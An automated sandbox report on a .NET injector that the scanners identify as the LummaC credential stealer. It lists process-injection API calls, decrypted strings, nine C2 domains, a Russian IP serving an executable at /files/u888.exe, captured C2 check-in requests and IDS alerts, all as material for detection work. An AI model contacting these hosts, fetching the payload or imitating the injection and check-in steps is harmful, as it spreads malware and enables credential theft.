Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.0000000000A03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00433FA0 LdrInitializeThunk,

3_2_00433FA0

Enables debug privileges

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, massiv, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miracledzmnqwui.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C2A008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
188.114.97.3	locatedblsoqp.shop	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	miracledzmnqwui.shop	European Union	13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
miracledzmnqwui.shop	188.114.96.3	true
locatedblsoqp.shop	188.114.97.3	true
traineiwnqo.shop	188.114.97.3	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://locatedblsoqp.shop/api	true	Avira URL Cloud: malware	unknown
miracledzmnqwui.shop	true	Avira URL Cloud: phishing	unknown
https://traineiwnqo.shop/api	true	Avira URL Cloud: malware	unknown
condedqpwqm.shop	true	Avira URL Cloud: phishing	unknown
stamppreewntnq.shop	true	Avira URL Cloud: phishing	unknown
evoliutwoqm.shop	true	Avira URL Cloud: safe	unknown
http://147.45.44.131/files/u888.exe	false	Avira URL Cloud: safe	unknown
locatedblsoqp.shop	true	Avira URL Cloud: phishing	unknown
caffegclasiqwp.shop	true	Avira URL Cloud: malware	unknown
https://miracledzmnqwui.shop/api	true	Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	Avira URL Cloud: phishing	unknown
traineiwnqo.shop	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: miracledzmnqwui.shop	Avira URL Cloud: Label: phishing
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/.%	Avira URL Cloud: Label: malware
Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/apim	Avira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/api	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/api	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/&%	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: https://miracledzmnqwui.shop/api	Avira URL Cloud: Label: malware
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/	Avira URL Cloud: Label: malware
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.RegAsm.exe.400000.0.raw.unpack

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: caffegclasiqwp.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stamppreewntnq.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stagedchheiqwo.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: millyscroqwp.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: evoliutwoqm.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: traineiwnqo.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: locatedblsoqp.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: miracledzmnqwui.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: WpM2Co--SUSELL

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	3_2_0043406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_0043406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0040B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_004100CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax+02h], 00000000h	3_2_00432080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push 00000000h	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00420120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	3_2_0041C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	3_2_004309A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_00436250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	3_2_00419A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	3_2_00419A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041FA7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0041C219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00429A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	3_2_0040A2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	3_2_0041EB5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+04h], ecx	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	3_2_00412BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00423BC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	3_2_00406B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	3_2_00406B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi]	3_2_004123AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00423C24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	3_2_00413555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	3_2_0040EDDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	3_2_00418580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00424D86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	3_2_0041E594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], cx	3_2_00412D9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [esp+20h]	3_2_0041CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	3_2_00436E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], dl	3_2_00423E16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	3_2_004366B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_0041AEBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_00420710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_0041A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_0041A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h	3_2_0040EFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+48h]	3_2_0040EFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004187E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	3_2_00418F9A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:50347 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055377 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop) : 192.168.2.7:57267 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:64418 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055378 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI) : 192.168.2.7:49703 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49703 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: miracledzmnqwui.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /files/u888.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic

HTTP traffic detected: GET /files/u888.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: miracledzmnqwui.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop

Source: unknown

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/files/u888.exe
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/files/u888.exeP
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/
Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/&%
Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/.%
Source: RegAsm.exe, 00000003.00000002.1292012501.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api
